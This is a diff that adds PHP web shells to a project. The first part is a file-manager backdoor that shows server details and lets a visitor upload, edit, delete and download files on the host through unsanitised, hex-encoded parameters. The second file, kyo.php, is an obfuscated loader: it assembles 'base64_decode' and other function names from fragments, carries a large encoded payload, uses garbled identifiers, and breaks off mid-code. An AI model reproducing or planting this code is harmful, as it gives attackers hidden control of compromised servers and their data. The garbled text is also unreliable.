+	echo "<script>swal({title: \"{$status}\", text: \"{$msg}\", icon: \"{$status}\"}).then((btnClick) => {if(btnClick){document.location.href=\"?p=".hex($p).$loc."\"}})</script>";
+}
+function deldir($d) {
+	global $fc;
+	if (trim(pathinfo($d, PATHINFO_BASENAME), '.') === '') return;
+	if ($fc[6]($d)) {
+		array_map("deldir", glob($d . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
+		rmdir($d);
+	} else {
+		unlink($d);
+	}
+}
+?>
+<!doctype html>
+<html lang="en"><head><link rel="icon" type="image/png" href="https://telegra.ph/file/5eff4384d348c68a7e978.png"><meta name="theme-color" content="red"><meta name="viewport" content="width=device-width, initial-scale=0.60, shrink-to-fit=no"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><title><?= self ?></title><style>.table-hover tbody tr:hover td{background:red}.table-hover tbody tr:hover td>*{color:#fff}.table>tbody>tr>*{color:#fff;vertical-align:middle}.form-control{background:0 0!important;color:#fff!important;border border-primary-radius:0}.form-control::placeholder{color:#fff;opacity:1}li{font-size:18px;margin-left:6px;list-style:none}a{color:#fff}</style><script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script></head><body style="background-color:#000;color:#fff;font-family:serif;"><div class="bg-black table-responsive text-light border border-primary rounded"><div class="d-flex justify-content-between p-1"><div><h3 class="mt-2"><a href="?"><?= self ?></a></h3></div><div><span>PHP Version : <?= $fc[1]() ?></span> <br><a href="?p=<?= hex($p)."&a=".hex("newFile") ?>">+File</a><a href="?p=<?= hex($p)."&a=".hex("newDir") ?>">+Directory</a></div></div><div class="border-primary border-top table-responsive">
+<li>uname : <?= $fc[0]() ?></li>
+<li>doc Root: <?= "{$_SERVER["DOCUMENT_ROOT"]}"; ?></li>
+<li>server: <?= "{$_SERVER["SERVER_ADDR"]}/{$_SERVER["REMOTE_ADDR"]}"; ?></li>
+<li>domain : <?= "{$_SERVER["SERVER_NAME"]}"; ?></li>
+<li>ip server: <?= getHostByName(getHostName()); ?></li>
+<li>php Version: <?= phpversion(); ?></li>
+<li>mysql: <?= (function_exists('mysql_connect')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>"; ?></li>
+<li>curl: <?= (function_exists('curl_version')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>"; ?></li>
+</div><form method="post" enctype="multipart/form-data"><div class="input-group mb-1 px-1 mt-1"><div class="custom-file"><input type="file" name="f[]" class="custom-file-input" onchange="this.form.submit()" multiple><label class="custom-file-label rounded-1 bg-transparent text-light">Choose file</label></div></div></form>
+<?php
+if (isset($_FILES["f"])) {
+	$n = $_FILES["f"]["name"];
+	for ($i = 0; $i < count($n); $i++) {
+		if ($fc[11]($_FILES["f"]["tmp_name"][$i], $n[$i])) {
+			a("file uploaded successfully");
+		} else {
+			a("file failed to upload", 0);
+		}
+	}
+}
+if (isset($_GET["download"])) {
+	header("Content-Type: application/octet-stream");
+	header("Content-Transfer-Encoding: Binary");
+	header("Content-Length: ".$fc[17](nhx($_GET["n"])));
+	header("Content-disposition: attachment; filename=\"".nhx($_GET["n"])."\"");
+}
+?>
+</div><div class="shadow-lg bg-black border border-primary table-responsive mt-2 rounded"><div class="ml-2" style="font-size:18px;"><span>Path: </span>
+<?php
+$ps = $fc[4]("/(\\\|\/)/", $p);
+foreach ($ps as $k => $v) {
+	if ($k == 0 && $v == "") {
+		echo "<a href=\"?p=2f\">~</a>/"; continue;
+	}
+	if ($v == "") continue;
+	echo "<a href=\"?p=";
+	for ($i = 0; $i <= $k; $i++) {
+		echo hex($ps[$i]);
+		if ($i != $k) echo "2f";
+	}
+	echo "\">{$v}</a>/";
+}
+?>
+</div></div><article class="shadow-lg bg-black border border-primary table-responsive mt-2 rounded">
+<?php if (!isset($_GET["a"])): ?>
+<table class="table table-hover table-border borderless table-sm"><thead class="text-light"><tr><th>Name</th><th>Size</th><th>Permission</th><th>Action</th></tr></thead><tbody class="text-light">
+<?php
+$scD = $fc[5]($scD($p), [".", ".."]);
+foreach ($scD as $d) {
+	if (!$fc[6]("$p/$d")) continue;
+	echo "<tr><td><a href=\"?p=".hex("$p/$d")."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on ".$fc[19]("Y-m-d H:i", $fc[20]("$p/$d"))."\"><i class=\"fa fa-fw fa-folder\"></i> {$d}</a></td><td>N/A</td><td><font color=\"".(($fc[8]("$p/$d")) ? "lime" : (!$fc[9]("$p/$d") ? "red" : null))."\">".perms("$p/$d")."</font></td><td><a href=\"?p=".hex($p)."&a=".hex("rename")."&n=".hex($d)."&t=d\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\"><i class=\"fa fa-fw fa-pencil\"></i></a><a href=\"?p=".hex($p)."&a=".hex("delete")."&n=".hex($d)."\" class=\"delete\" data-type=\"folder\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\"><i class=\"fa fa-fw fa-trash\"></i></a></td></tr>";
+}
+foreach ($scD as $f) {
+	if (!$fc[7]("$p/$f")) continue;
+	$sz = $fc[10]("$p/$f")/1024;
+	$sz = round($sz, 3);
+	$sz = ($sz > 1024) ? round($sz/1024, 2)."MB" : $sz."KB";
+	echo "<tr><td><a href=\"?p=".hex($p)."&a=".hex("view")."&n=".hex($f)."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on ".$fc[19]("Y-m-d H:i", $fc[20]("$p/$f"))."\"><i class=\"fa fa-fw fa-file\"></i> {$f}</a></td><td>{$sz}</td><td><font color=\"".(($fc[8]("$p/$f")) ? "lime" : (!$fc[9]("$p/$f") ? "red" : null))."\">".perms("$p/$f")."</font></td><td><div class=\"d-flex justify-content-between\"><a href=\"?p=".hex($p)."&a=".hex("edit")."&n=".hex($f)."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Edit\"><i class=\"fa fa-fw fa-edit\"></i></a><a href=\"?p=".hex($p)."&a=".hex("rename")."&n=".hex($f)."&t=f\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\"><i class=\"fa fa-fw fa-pencil\"></i></a><a href=\"?p=".hex($p)."&n=".hex($f)."&download"."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Download\"><i class=\"fa fa-fw fa-download\"></i></a><a href=\"?p=".hex($p)."&a=".hex("delete")."&n=".hex($f)."\" class=\"delete\" data-type=\"file\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\"><i class=\"fa fa-fw fa-trash\"></i></a></div></td></tr>";
+}
+?></tbody></table>
+<?php else :if (isset($_GET["a"])) $a = nhx($_GET["a"]); ?>
+<div class="px-2 py-2">
+<?php if ($a == "delete") {
+	$loc = $p.'/'.nhx($_GET["n"]);
+	if ($_GET["t"] == "d") {
+		deldir($loc);
+		if (!$fc[12]($loc)) {
+			a("folder deleted successfully");
+		} else {
+			a("failed to delete the folder", 0);
+		}
+	}
+	if ($_GET["t"] == "f") {
+		$loc = $p.'/'.nhx($_GET["n"]);
+		unlink($loc);
+		if (!$fc[12]($loc)) {
+			a("file deleted successfully");
+		} else {
+			a("file to delete the folder", 0);
+		}
+	}
+}
+?>
+<?php if ($a == "newDir"): ?>
+<h5 class="border border-primary p-1 mb-3">New folder</h5>
+<form method="post"><div class="form-group"><label for="n">Name :</label><input name="n" id="n" class="form-control" autocomplete="off"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form>
+<?php ((isset($_POST["s"])) ? ($fc[12]("$p/{$_POST["n"]}") ? a("folder name has been used", 0, "&a=".hex("newDir")) : ($fc[15]("$p/{$_POST["n"]}") ? a("folder created successfully") : a("folder failed to create", 0))) : null); elseif ($a == "newFile"): ?>
+<h5 class="border border-primary p-1 mb-3">New file</h5>
+<form method="post"><div class="form-group"><label for="n">File name :</label><input type="text" name="n" id="n" class="form-control" placeholder="hack.txt"></div><div class="form-group"><label for="ctn">Content :</label><textarea style="resize:none" name="ctn" id="ctn" cols="30" rows="10" class="form-control" placeholder="# Stamped By Me"></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form>
+<?php ((isset($_POST["s"])) ? ($fc[12]("$p/{$_POST["n"]}") ? a("file name has been used", 0, "&a=".hex("newFile")) : ($fc[13]("$p/{$_POST["n"]}", $_POST["ctn"]) ? a("file created successfully",1,"&a=".hex("view")."&n=".hex($_POST["n"])) : a("file failed to create", 0))) : null); elseif ($a == "rename"): ?>
+<h5 class="border border-primary p-1 mb-3">Rename <?= (($_GET["t"] == "d") ? "folder" : "file") ?></h5>
+<form method="post"><div class="form-group"><label for="n">Name :</label><input type="text" name="n" id="n" class="form-control" value="<?= nhx($_GET["n"]) ?>"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form>
+<?php ((isset($_POST["s"])) ? ($fc[16]($p.'/'.nhx($_GET["n"]), $_POST["n"]) ? a("successfully changed the folder name") : a("failed to change the folder name", 0)) : null); elseif ($a == "edit"): ?>
+<h5 class="border border-primary p-1 mb-3">Edit file</h5>
+<span>File name : <?= nhx($_GET["n"]) ?></span>
+<form method="post"><div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control"><?= $fc[18]($fc[14]($p.'/'.nhx($_GET["n"]))) ?></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form>
+<?php ((isset($_POST["s"])) ? ($fc[13]($p.'/'.nhx($_GET["n"]), $_POST["ctn"]) ? a("file contents changed successfully", 1, "&a=".hex("view")."&n={$_GET["n"]}") : a("file contents failed to change")) : null); elseif ($a == "view"): ?>
+<h5 class="border border-primary p-1 mb-3">View file</h5>
+<span>File name : <?= nhx($_GET["n"]) ?></span>
+<div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control" readonly><?= $fc[18]($fc[14]($p.'/'.nhx($_GET["n"]))) ?></textarea></div><?php endif; ?></div><?php endif; ?></article><div class="bg-black text-center mt-2"><small></small></div><script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script><script src="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js" ></script><script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script></body></html>

php/zxc/kyo.php

@@ -0,0 +1,185 @@
+<?php
+$<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>嶨<EFBFBD><E5B6A8><EFBFBD><EFBFBD><EFBFBD>樯慬<E6A8AF><E685AC><EFBFBD><EFBFBD>庘<EFBFBD><E5BA98><EFBFBD>儺榗<E584BA><E6A697>禳<EFBFBD>閳<EFBFBD>肑<EFBFBD>緳<EFBFBD><E7B7B3> =
+    "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";
+<EFBFBD><EFBFBD><EFBFBD>䆀嘉<EFBFBD><EFBFBD>尟<EFBFBD><EFBFBD><EFBFBD>嬨<EFBFBD>友<EFBFBD>弣<EFBFBD><EFBFBD>庘<EFBFBD><EFBFBD><EFBFBD><EFBFBD>廜閦<EFBFBD><EFBFBD>峉<EFBFBD>锁<EFBFBD><EFBFBD><EFBFBD><EFBFBD>訏<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>矣<EFBFBD>庣<EFBFBD><EFBFBD>揯<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>娅<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>覮<EFBFBD><EFBFBD><EFBFBD>聜<EFBFBD><EFBFBD>妗(
+    $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>嶨<EFBFBD><E5B6A8><EFBFBD><EFBFBD><EFBFBD>樯慬<E6A8AF><E685AC><EFBFBD><EFBFBD>庘<EFBFBD><E5BA98><EFBFBD>儺榗<E584BA><E6A697>禳<EFBFBD>閳<EFBFBD>肑<EFBFBD>緳<EFBFBD><E7B7B3>
+);
+function <EFBFBD><EFBFBD><EFBFBD>䆀嘉<EFBFBD><EFBFBD>尟<EFBFBD><EFBFBD><EFBFBD>嬨<EFBFBD>友<EFBFBD>弣<EFBFBD><EFBFBD>庘<EFBFBD><EFBFBD><EFBFBD><EFBFBD>廜閦<EFBFBD><EFBFBD>峉<EFBFBD>锁<EFBFBD><EFBFBD><EFBFBD><EFBFBD>訏<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>矣<EFBFBD>庣<EFBFBD><EFBFBD>揯<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>娅<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>覮<EFBFBD><EFBFBD><EFBFBD>聜<EFBFBD><EFBFBD>妗(
+    $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>朙趣<E69C99>䉆<EFBFBD><E48986><EFBFBD><EFBFBD>机<EFBFBD><E69CBA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+) {
+    $<24><><EFBFBD><EFBFBD>庯<EFBFBD><E5BAAF><EFBFBD>䰨<EFBFBD><E4B0A8>椺召<E6A4BA><E58FAC><EFBFBD><EFBFBD>谘<EFBFBD><E8B098><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>傯<EFBFBD><E582AF><EFBFBD><EFBFBD>痖<EFBFBD>呜<EFBFBD><E5919C><EFBFBD>昺<EFBFBD><E698BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>埴䜺<E59FB4><E49CBA><EFBFBD><EFBFBD><EFBFBD>晤<EFBFBD>寏<EFBFBD><E5AF8F><EFBFBD><EFBFBD> =
+        "bas" . "e64" . "_de" . "cod" . "e";
+    $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD> = [
+        "C",
+        "P",
+        "Q",
+        "T",
+        "U",
+        "M",
+        "V",
+        "h",
+        "E",
+        "L",
+        "l",
+        "0",
+        "K",
+        "8",
+        "C",
+        "l",
+        "a",
+        "U",
+        "D",
+        "e",
+        "4",
+        "I",
+        "m",
+        "1",
+        "5",
+        "s",
+        "b",
+        "R",
+        "Y",
+        "O",
+        "u",
+        "W",
+        "X",
+        "Z",
+        "+",
+        "c",
+        "@",
+        "d",
+        "3",
+        "r",
+        "F",
+        ")",
+        "B",
+        "y",
+        "C",
+        "J",
+        "q",
+        "G",
+        "#",
+        $<24><><EFBFBD><EFBFBD>庯<EFBFBD><E5BAAF><EFBFBD>䰨<EFBFBD><E4B0A8>椺召<E6A4BA><E58FAC><EFBFBD><EFBFBD>谘<EFBFBD><E8B098><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>傯<EFBFBD><E582AF><EFBFBD><EFBFBD>痖<EFBFBD>呜<EFBFBD><E5919C><EFBFBD>昺<EFBFBD><E698BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>埴䜺<E59FB4><E49CBA><EFBFBD><EFBFBD><EFBFBD>晤<EFBFBD>寏<EFBFBD><E5AF8F><EFBFBD><EFBFBD>(
+            "Uw=="
+        ),
+        $<24><><EFBFBD><EFBFBD>庯<EFBFBD><E5BAAF><EFBFBD>䰨<EFBFBD><E4B0A8>椺召<E6A4BA><E58FAC><EFBFBD><EFBFBD>谘<EFBFBD><E8B098><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>傯<EFBFBD><E582AF><EFBFBD><EFBFBD>痖<EFBFBD>呜<EFBFBD><E5919C><EFBFBD>昺<EFBFBD><E698BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>埴䜺<E59FB4><E49CBA><EFBFBD><EFBFBD><EFBFBD>晤<EFBFBD>寏<EFBFBD><E5AF8F><EFBFBD><EFBFBD>(
+            "bw=="
+        ),
+        $<24><><EFBFBD><EFBFBD>庯<EFBFBD><E5BAAF><EFBFBD>䰨<EFBFBD><E4B0A8>椺召<E6A4BA><E58FAC><EFBFBD><EFBFBD>谘<EFBFBD><E8B098><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>傯<EFBFBD><E582AF><EFBFBD><EFBFBD>痖<EFBFBD>呜<EFBFBD><E5919C><EFBFBD>昺<EFBFBD><E698BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>埴䜺<E59FB4><E49CBA><EFBFBD><EFBFBD><EFBFBD>晤<EFBFBD>寏<EFBFBD><E5AF8F><EFBFBD><EFBFBD>(
+            "SA=="
+        ),
+        "4",
+        "A",
+        "i",
+        "j",
+        "t",
+        "v",
+        "w",
+        "x",
+        "z",
+        "g",
+        "%",
+        "(",
+        '$',
+        "_",
+        "+",
+        "2",
+        "x",
+        "(",
+        "f",
+        "6",
+        "j",
+        "k",
+        "n",
+        "p",
+        "*",
+        "9",
+        "N",
+        "1",
+        "3",
+        "3",
+        "7",
+        ";",
+    ];
+    $<24><><EFBFBD><EFBFBD>箮<EFBFBD><E7AEAE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> =
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[29] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[56] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[23] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[80] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[63] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[61] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[33] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[21] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[74] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[40];
+    $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>剤<EFBFBD>磺嬋儴<E5AC8B>叙<EFBFBD><E58F99>躺<EFBFBD><E8BABA><EFBFBD><EFBFBD><EFBFBD> =
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[8] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[57] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[53] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[15] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[63] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[49] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[56] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[27] .
